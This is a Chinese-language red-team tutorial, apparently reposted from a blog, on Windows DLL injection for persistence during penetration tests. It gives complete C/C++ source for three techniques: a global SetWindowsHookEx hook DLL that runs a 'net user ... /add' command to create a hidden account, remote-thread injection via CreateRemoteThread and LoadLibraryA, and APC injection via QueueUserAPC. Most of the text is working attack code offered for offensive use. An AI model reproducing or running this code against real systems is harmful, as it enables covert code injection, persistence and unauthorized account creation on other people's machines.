红队 ｜ Windows注入的一些方式

Delina

原文链接：红队 ｜ Windows注入的一些方式
​
在渗透过程中有时候为了权限维持或者其他等一些操作，比如以前的搜狗输入法可以替换dll文件当用户切换输入法就会去加载我们替换的dll文件，dll文件可以自己编写一些net user或者其他的一些方法，也可以通过msf等来生成dll文件进行替换。
0x01 Global hook Injectwindows中一般应用都是通过消息机制的，操作系统提高了钩子，他的作用就是用来截获和监视系统的这些消息。
局部钩子：针对某个线程的。 全局钩子：针对整个系统基于消息的应用。该钩子需要dll文件，在dll中实现对应的钩子函数。
使用SetWindowsHookEx安装WH_GETMESSAGE类型的钩子，并且钩子进程函数在一个 DLL 中，则该 DLL 可以实现全局注入
注：WH_GETMESSAGE用来钩PostMessage消息。
SetWindowsHookEx:

1. HHOOK WINAPI SetWindowsHookEx(
   
2.   _In_ int idHook，
   
3.   _In_ HOOKPROC lpfn，
   
4.   _In_ HINSTANCE hMod，
   
5.   _In_ DWORD dwThreadId
   
6. );

复制代码

1. idHook:钩子的类型
   
2. lpfn:指向钩子程序的指针，钩子过程函数。
   
3. hMod:dll函数模块句柄，DllMain的第一个参数
   
4. dwThreadId:hook程序关联的线程的ID。如果为0表示与系统关联的所有进程

复制代码

如果函数执行成功则返回的是钩子过程的句柄。反之如果执行失败返回NULL。DLL实现代码：

1. // dllmain.cpp : 定义 DLL 应用程序的入口点。
   
2. #include "pch.h"
   
3. #include <Windows.h>
   
4. HHOOK g_hHook;
   
5. HMODULE g_hModule;
   
6. LRESULT CALLBACK GetMsgProc(
   
7.     _In_ int    code,
   
8.     _In_ WPARAM wParam,
   
9.     _In_ LPARAM lParam
   
10. )
    
11. {
    
12.     return CallNextHookEx(g_hHook, code, wParam, lParam);
    
13. }
    
14. BOOL LoadHook(void) {
    
15.     g_hHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)GetMsgProc, g_hModule, 0);
    
16.     if (g_hHook) {
    
17.         WinExec("net user aspnet '1qaz@WSX' /add", SW_NORMAL);
    
18.         MessageBox(NULL, TEXT("load successfully"), TEXT("title"), MB_OK);
    
19.         return TRUE;
    
20.     }
    
21.     else {
    
22.         return FALSE;
    
23.     }
    
24. }
    
25. VOID UnloadHook(void)
    
26. {
    
27.     if (g_hHook)
    
28.         UnhookWindowsHookEx(g_hHook);
    
29. }
    
30. BOOL APIENTRY DllMain( HMODULE hModule,
    
31.                        DWORD  ul_reason_for_call,
    
32.                        LPVOID lpReserved
    
33.                      )
    
34. {
    
35.     switch (ul_reason_for_call)
    
36.     {
    
37.     case DLL_PROCESS_ATTACH:
    
38.         g_hModule = hModule;
    
39.         MessageBox(NULL, TEXT("loading"), TEXT("title"), MB_OK);
    
40.         break;
    
41.     case DLL_THREAD_ATTACH:
    
42.     case DLL_THREAD_DETACH:
    
43.     case DLL_PROCESS_DETACH:
    
44.         break;
    
45.     }
    
46.     return TRUE;
    
47. }

复制代码

DLL的实现过程：1.设置钩子2.取消钩子3.钩子程序的函数4.导出相关功能钩子的回调函数：

1. LRESULT CALLBACK GetMsgProc(
   
2.     _In_ int    code,
   
3.     _In_ WPARAM wParam,
   
4.     _In_ LPARAM lParam
   
5. )
   
6. {
   
7.     return CallNextHookEx(g_hHook, code, wParam, lParam);
   
8. }

复制代码

回调函数的参数和返回值都是固定的，CallNextHookEx函数表示将当前钩子传递给钩子链的笑一个钩子，第一个参数指定的就是当前钩子的句柄g_hHook添加.def文件：

1. LIBRARY
   
2. EXPORTS
   
3. LoadHook
   
4. UnloadHook

复制代码

dll是无法自己去启动的，需要一个程序来加载它。
调用程序：

1. #include <windows.h>
   
2. #include <stdio.h>
   
3. int main()
   
4. {
   
5.     HMODULE hModule = LoadLibraryA("Dll.dll");
   
6.     if (hModule == NULL)
   
7.         return 0;
   
8.     FARPROC pfnLoadHook = GetProcAddress(hModule, "LoadHook");
   
9.     FARPROC pfnUnloadHook = GetProcAddress(hModule, "UnloadHook");
   
10.     if (pfnLoadHook == NULL || pfnUnloadHook == NULL)
    
11.         return 0;
    
12.     if (pfnLoadHook())
    
13.         printf("load successfull");
    
14.     else {
    
15.         printf("load failed");
    
16.         return 0;
    
17.     }
    
18.     printf("Press any key to unload global hook");
    
19.     getchar();
    
20.     pfnUnloadHook();
    
21.     printf("uninstall successfull");
    
22.     return 0;
    
23. }

复制代码

​
0x02 remote injection Dll远线程注入是指一个进程在另外一个进程中创建线程的技术。
OpenProcess：

1. HANDLE OpenProcess(
   
2.   DWORD dwDesiredAccess,
   
3.   BOOL  bInheritHandle,
   
4.   DWORD dwProcessId
   
5. );

复制代码

1. 1.dwDesiredAccess该参数可以是一个或多个 进程访问权限。
   
2. 2.如果此值为 TRUE，则此进程创建的进程将继承句柄。否则，进程不会继承这个句柄。
   
3. 3.要打开的本地进程的PID

复制代码

第一个参数具体可以查看[进程访问权限]:https://docs.microsoft.com/en-us ... y-and-access-rights
VirtualAllocEx:

1. LPVOID VirtualAllocEx(
   
2.   HANDLE hProcess,
   
3.   LPVOID lpAddress,
   
4.   SIZE_T dwSize,
   
5.   DWORD  flAllocationType,
   
6.   DWORD  flProtect
   
7. );

复制代码

1.hProcess:进程的句柄。该函数在该进程的虚拟地址空间内分配内存。

1. 2.lpAddress:为要分配的页面区域指定所需起始地址的指针,如果lpAddress为NULL，则该函数确定分配区域的位置。
   
2. 3.dwSize:要分配的内存区域的大小，以字节为单位。
   
3. 4.flAllocationType:内存分配的类型。

复制代码

flAllocationType具体可以查看[flAllocationType]：https://docs.microsoft.com/zh-cn ... 26l%3DZH-CN%26k%3Dk(MEMORYAPI%252FVirtualAllocEx);k(VirtualAllocEx);k(DevLang-C%252B%252B);k(TargetOS-Windows)%26rd%3DtrueWriteProcessMemory:

1. BOOL WriteProcessMemory(
   
2.   HANDLE  hProcess,
   
3.   LPVOID  lpBaseAddress,
   
4.   LPCVOID lpBuffer,
   
5.   SIZE_T  nSize,
   
6.   SIZE_T  *lpNumberOfBytesWritten
   
7. );

复制代码

1. 1.hProcess:要修改的进程内存的句柄。句柄必须具有对进程的 PROCESS_VM_WRITE 和 PROCESS_VM_OPERATION 访问权限。
   
2. 2.lpBaseAddress:指向指定进程中写入数据的基地址的指针。
   
3. 3.lpBuffer:指向包含要写入指定进程地址空间的数据的缓冲区的指针。
   
4. 4.nSize:要写入指定进程的字节数。
   
5. 5.lpNumberOfBytesWritten:一个指向接收传输到指定进程的字节数的变量的指针。该参数是可选的。如果lpNumberOfBytesWritten为NULL，则忽略该参数。

复制代码

CreateRemoteThread:

1. HANDLE CreateRemoteThread(
   
2.   HANDLE                 hProcess,
   
3.   LPSECURITY_ATTRIBUTES  lpThreadAttributes,
   
4.   SIZE_T                 dwStackSize,
   
5.   LPTHREAD_START_ROUTINE lpStartAddress,
   
6.   LPVOID                 lpParameter,
   
7.   DWORD                  dwCreationFlags,
   
8.   LPDWORD                lpThreadId
   
9. );

复制代码

1.hProcess:要在其中创建线程的进程的句柄。

1. 2.lpThreadAttributes:指向SECURITY_ATTRIBUTES结构的指针，该 结构为新线程指定安全描述符并确定子进程是否可以继承返回的句柄。
   
2. 3.dwStackSize:堆栈的初始大小，以字节为单位。
   
3. 4.lpStartAddress:指向要由线程执行的LPTHREAD_START_ROUTINE 类型的应用程序定义函数的指针，表示远程进程中线程的起始地址。该函数必须存在于远程进程中。
   
4. 5.lpParameter:指向要传递给线程函数的变量的指针。
   
5. 6.dwCreationFlags:控制线程创建的标志。该值如果是0，线程在创建后立即运行。
   
6. 7.lpThreadId：指向接收线程标识符的变量的指针。

复制代码

程序代码：

1. #include <stdio.h>
   
2. #include <Windows.h>
   
3. #include <iostream>
   
4. #include <Tlhelp32.h>
   
5. BOOL InjectDll(const char* szDllPath, int rProcessId) {
   
6.     HANDLE hProcess = NULL;
   
7.     LPVOID pDllAddr = NULL;
   
8.     FARPROC pfnStartAddr = NULL;
   
9.     HANDLE hRemoteThread = NULL;
   
10.     //打开进程
    
11.     hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, rProcessId);
    
12.     if (hProcess == INVALID_HANDLE_VALUE) {
    
13.         return FALSE;
    
14.     }
    
15.     //在要注入的进程中申请内存
    
16.     pDllAddr = VirtualAllocEx(hProcess, NULL, strlen(szDllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
    
17.     if (!pDllAddr)
    
18.     {
    
19.         return FALSE;
    
20.     }
    
21.     //给要注入的进程中写入数据
    
22.     WriteProcessMemory(hProcess, pDllAddr, szDllPath, strlen(szDllPath) + 1, NULL);
    
23.    
    
24.     //获取LoadLibraryA函数的地址
    
25.     pfnStartAddr = GetProcAddress(::GetModuleHandle("Kernel32"), "LoadLibraryA");
    
26.     //使用CreateRemoteThread创建远线程，注入DLL
    
27.     if ((hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnStartAddr, pDllAddr, 0, NULL)) == NULL)
    
28.     {
    
29.         std::cout << "Injecting thread failed!" << std::endl;
    
30.         return FALSE;
    
31.     }
    
32.     /*CloseHandle(hProcess);
    
33.     CloseHandle(hRemoteThread);*/
    
34.    
    
35.     return TRUE;
    
36. }
    
37. int GetProcessID(const char* szProcessNames) {
    
38.     int iRet = -1;
    
39.     PROCESSENTRY32 pe32;
    
40.     pe32.dwSize = sizeof(PROCESSENTRY32);
    
41.     HANDLE hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    
42.     BOOL bProcess = Process32First(hTool32, &pe32);
    
43.     if (bProcess == TRUE)
    
44.     {
    
45.         while ((Process32Next(hTool32, &pe32)) == TRUE)
    
46.         {
    
47.             if (strcmp(pe32.szExeFile, szProcessNames) == 0)
    
48.             {
    
49.                 iRet = pe32.th32ProcessID;
    
50.                 break;
    
51.             }
    
52.         }
    
53.     }
    
54.     return iRet;
    
55. }
    
56. int main() {
    
57.     int rProcessId = GetProcessID("Demo.exe");
    
58.     printf("%d",rProcessId);
    
59.     if (rProcessId > 0) {
    
60.         InjectDll("F:\\Dll.dll", rProcessId);
    
61.     }
    
62.     return 0;
    
63. }

复制代码

​
​​
通过Process Monistor查看成功注入了dll文件
​
0x03 APC Inject•线程在进程内执行代码•线程可以利用 APC 队列异步执行代码•每个线程都有一个队列来存储所有的 APC•应用程序可以将 APC 排队到给定的线程（取决于权限）•当一个线程被调度时，排队的 APC 被执行
APC就是为异步过程调用。
APC注入的一般几个步骤：
•首先通过OpenProcess函数打开目标进程，获取目标进程的句柄。•然后，通过调用WIN32 API函数CreateToolhelp32Snapshot、Thread32First和Thread32Next，遍历线程快照，获取目标进程的所有线程ID。•然后调用VirtualAllocEx函数在目标进程中申请一块内存，通过WriteProcessMemory函数将注入的DLL路径写入内存。•最后遍历上面得到的线程ID，调用OpenThread函数打开具有THREAD_ALL_ACCESS访问权限的线程，获取线程句柄。并调用QueueUserAPC函数将APC函数插入线程，将APC函数的地址设置为LoadLibraryA函数的地址，将APC函数参数设置为上述DLL路径地址。•只要目标进程中的任何一个线程被唤醒，就会执行APC来完成DLL注入操作
每一个线程都有自己的APC队列，使用QueueUserAPC函数把一个APC函数压入APC队列中。
QueueUserAPC:
DWORD QueueUserAPC(  PAPCFUNC  pfnAPC,  HANDLE    hThread,  ULONG_PTR dwData);1.pfnPAC:表示要执行的函数的地址，指向应用程序提供的 APC 函数的指针，当指定的线程执行可警报的等待操作时将调用该函数。2.hThread:线程的句柄。句柄必须具有THREAD_SET_CONTEXT访问权限。3.dwData:传递给pfnAPC参数指向的 APC 函数的单个值。实现代码：

1. #include <Windows.h>
   
2. #include<TlHelp32.h>
   
3. // 根据进程名称获取PID
   
4. DWORD GetProcessPID(const char* pszProcessName)
   
5. {
   
6.     DWORD dwProcessId = 0;
   
7.     PROCESSENTRY32 pe32 = { 0 };
   
8.     HANDLE hSnapshot = NULL;
   
9.     BOOL bRet = FALSE;
   
10.     ::RtlZeroMemory(&pe32, sizeof(pe32));
    
11.     pe32.dwSize = sizeof(pe32);
    
12.     // 获取进程快照
    
13.     hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    
14.     if (NULL == hSnapshot)
    
15.     {
    
16.         MessageBox(NULL, "CreateToolhelp32Snapshot error", "TITLE", MB_OK);
    
17.         return dwProcessId;
    
18.     }
    
19.     // 获取第一条进程快照信息
    
20.     bRet = ::Process32First(hSnapshot, &pe32);
    
21.     while (bRet)
    
22.     {
    
23.         // 获取快照信息
    
24.         if (0 == ::lstrcmpi(pe32.szExeFile, pszProcessName))
    
25.         {
    
26.             dwProcessId = pe32.th32ProcessID;
    
27.             break;
    
28.         }
    
29.         // 遍历下一个进程快照信息
    
30.         bRet = ::Process32Next(hSnapshot, &pe32);
    
31.     }
    
32.     return dwProcessId;
    
33. }
    
34. // 根据PID获取所有的相应线程ID
    
35. BOOL GetThreadID(DWORD dwProcessId, DWORD** ppThreadId, DWORD* pdwThreadIdLength)
    
36. {
    
37.     DWORD* pThreadId = NULL;
    
38.     DWORD dwThreadIdLength = 0;
    
39.     DWORD dwBufferLength = 1000;
    
40.     THREADENTRY32 te32 = { 0 };
    
41.     HANDLE hSnapshot = NULL;
    
42.     BOOL bRet = TRUE;
    
43.     do
    
44.     {
    
45.         // 申请内存
    
46.         pThreadId = new DWORD[dwBufferLength];
    
47.         if (NULL == pThreadId)
    
48.         {
    
49.             MessageBox(NULL, "申请内存 error", "TITLE", MB_OK);
    
50.             bRet = FALSE;
    
51.             break;
    
52.         }
    
53.         ::RtlZeroMemory(pThreadId, (dwBufferLength * sizeof(DWORD)));
    
54.         // 获取线程快照
    
55.         ::RtlZeroMemory(&te32, sizeof(te32));
    
56.         te32.dwSize = sizeof(te32);
    
57.         hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    
58.         if (NULL == hSnapshot)
    
59.         {
    
60.             MessageBox(NULL, "CreateToolhelp32Snapshot error", "TITLE", MB_OK);
    
61.             bRet = FALSE;
    
62.             break;
    
63.         }
    
64.         // 获取第一条线程快照信息
    
65.         bRet = ::Thread32First(hSnapshot, &te32);
    
66.         while (bRet)
    
67.         {
    
68.             // 获取进程对应的线程ID
    
69.             if (te32.th32OwnerProcessID == dwProcessId)
    
70.             {
    
71.                 pThreadId[dwThreadIdLength] = te32.th32ThreadID;
    
72.                 dwThreadIdLength++;
    
73.             }
    
74.             // 遍历下一个线程快照信息
    
75.             bRet = ::Thread32Next(hSnapshot, &te32);
    
76.         }
    
77.         // 返回
    
78.         *ppThreadId = pThreadId;
    
79.         *pdwThreadIdLength = dwThreadIdLength;
    
80.         bRet = TRUE;
    
81.     } while (FALSE);
    
82.     if (FALSE == bRet)
    
83.     {
    
84.         if (pThreadId)
    
85.         {
    
86.             delete[]pThreadId;
    
87.             pThreadId = NULL;
    
88.         }
    
89.     }
    
90.     return bRet;
    
91. }
    
92. // APC注入
    
93. BOOL ApcInjectDll(const char* pszProcessName,const char* pszDllName)
    
94. {
    
95.     BOOL bRet = FALSE;
    
96.     DWORD dwProcessId = 0;
    
97.     DWORD* pThreadId = NULL;
    
98.     DWORD dwThreadIdLength = 0;
    
99.     HANDLE hProcess = NULL, hThread = NULL;
    
100.     PVOID pBaseAddress = NULL;
     
101.     PVOID pLoadLibraryAFunc = NULL;
     
102.     SIZE_T dwRet = 0, dwDllPathLen = 1 + ::lstrlen(pszDllName);
     
103.     DWORD i = 0;
     
104.     do
     
105.     {
     
106.         // 根据进程名称获取PID
     
107.         dwProcessId = GetProcessPID(pszProcessName);
     
108.         if (0 >= dwProcessId)
     
109.         {
     
110.             bRet = FALSE;
     
111.             break;
     
112.         }
     
113.         // 根据PID获取所有的相应线程ID
     
114.         bRet = GetThreadID(dwProcessId, &pThreadId, &dwThreadIdLength);
     
115.         if (FALSE == bRet)
     
116.         {
     
117.             bRet = FALSE;
     
118.             break;
     
119.         }
     
120.         // 打开注入进程
     
121.         hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
     
122.         if (NULL == hProcess)
     
123.         {
     
124.             MessageBox(NULL, "OpenProcess error", "TITLE", MB_OK);
     
125.             bRet = FALSE;
     
126.             break;
     
127.         }
     
128.         // 在注入进程空间申请内存
     
129.         pBaseAddress = ::VirtualAllocEx(hProcess, NULL, dwDllPathLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
     
130.         if (NULL == pBaseAddress)
     
131.         {
     
132.             MessageBox(NULL, "VirtualAllocEx error", "TITLE", MB_OK);
     
133.             bRet = FALSE;
     
134.             break;
     
135.         }
     
136.         // 向申请的空间中写入DLL路径数据
     
137.         ::WriteProcessMemory(hProcess, pBaseAddress, pszDllName, dwDllPathLen, &dwRet);
     
138.         if (dwRet != dwDllPathLen)
     
139.         {
     
140.             MessageBox(NULL, "WriteProcessMemory error", "TITLE", MB_OK);
     
141.             bRet = FALSE;
     
142.             break;
     
143.         }
     
144.         // 获取 LoadLibrary 地址
     
145.         pLoadLibraryAFunc = ::GetProcAddress(::GetModuleHandle("kernel32.dll"), "LoadLibraryA");
     
146.         if (NULL == pLoadLibraryAFunc)
     
147.         {
     
148.             MessageBox(NULL, "GetProcAddress error", "TITLE", MB_OK);
     
149.             bRet = FALSE;
     
150.             break;
     
151.         }
     
152.         // 遍历线程, 插入APC
     
153.         i = dwThreadIdLength;
     
154.         for (; i > 0; --i)
     
155.         {
     
156.             // 打开线程
     
157.             hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]);
     
158.             if (hThread)
     
159.             {
     
160.                 // 插入APC
     
161.                 ::QueueUserAPC((PAPCFUNC)pLoadLibraryAFunc, hThread, (ULONG_PTR)pBaseAddress);
     
162.                 // 关闭线程句柄
     
163.                 ::CloseHandle(hThread);
     
164.                 hThread = NULL;
     
165.             }
     
166.         }
     
167.         bRet = TRUE;
     
168.     } while (FALSE);
     
169.     // 释放内存
     
170.     if (hProcess)
     
171.     {
     
172.         ::CloseHandle(hProcess);
     
173.         hProcess = NULL;
     
174.     }
     
175.     if (pThreadId)
     
176.     {
     
177.         delete[]pThreadId;
     
178.         pThreadId = NULL;
     
179.     }
     
180.     return bRet;
     
181. }
     
182. int main() {
     
183.     ApcInjectDll("Demo.exe", "F:\\Dll.dll");
     
184.     return 0;
     
185. }

复制代码

​
​
​
​